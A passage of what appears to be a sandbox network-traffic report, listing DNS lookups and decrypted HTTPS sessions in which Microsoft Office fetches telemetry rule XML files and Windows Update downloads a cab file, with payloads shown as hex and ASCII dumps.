Nov 25, 2024 11:34:00.270237923 CET	1.1.1.1	192.168.2.5	0x5670	No error (0)	googlehosted.l.googleusercontent.com		172.217.19.225	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.270720005 CET	1.1.1.1	192.168.2.5	0x7836	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:34:00.370409966 CET	1.1.1.1	192.168.2.5	0x4042	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:34:00.739217997 CET	1.1.1.1	192.168.2.5	0x23bd	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.739217997 CET	1.1.1.1	192.168.2.5	0x23bd	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.740299940 CET	1.1.1.1	192.168.2.5	0x62d0	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 25, 2024 11:34:00.740633011 CET	1.1.1.1	192.168.2.5	0x951a	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 25, 2024 11:34:00.740895033 CET	1.1.1.1	192.168.2.5	0xbfc1	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.740895033 CET	1.1.1.1	192.168.2.5	0xbfc1	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.749895096 CET	1.1.1.1	192.168.2.5	0x5446	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.749895096 CET	1.1.1.1	192.168.2.5	0x5446	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.750000000 CET	1.1.1.1	192.168.2.5	0xf453	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 25, 2024 11:34:04.546061039 CET	1.1.1.1	192.168.2.5	0x6cc	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:34:04.546061039 CET	1.1.1.1	192.168.2.5	0x6cc	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49706	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:16 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:16 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:16 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT ETag: "0x8DD0BB889D4282C" x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103316Z-178bfbc474bxkclvhC1NYC69g400000007900000000059km x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:16 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-25 10:33:17 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49704	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:16 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CLr1vYdRECxUGOz&MD=ON2O2D6F HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-25 10:33:17 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 891f9abf-be71-419b-bf06-ee09e2ae91c9 MS-RequestId: 8ff008f2-e164-47cf-9f4e-577132cff69e MS-CV: VFRqbh85rU2fu9hI.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 10:33:16 GMT Connection: close Content-Length: 24490
2024-11-25 10:33:17 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-25 10:33:17 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49713	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:19 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:19 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 2bdd5943-e01e-0052-493a-3dd9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103319Z-178bfbc474brk967hC1NYCfu60000000072g000000008pwt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:19 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.5	49711	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:19 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:19 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 97edb58e-001e-00a2-13a4-3ed4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103319Z-178bfbc474bscnbchC1NYCe7eg00000007h0000000003vse x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:19 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.5	49712	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:19 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:19 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:19 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 8db92378-201e-003f-2cbf-3e6d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103319Z-178bfbc474bfw4gbhC1NYCunf4000000078000000000bcte x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:19 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

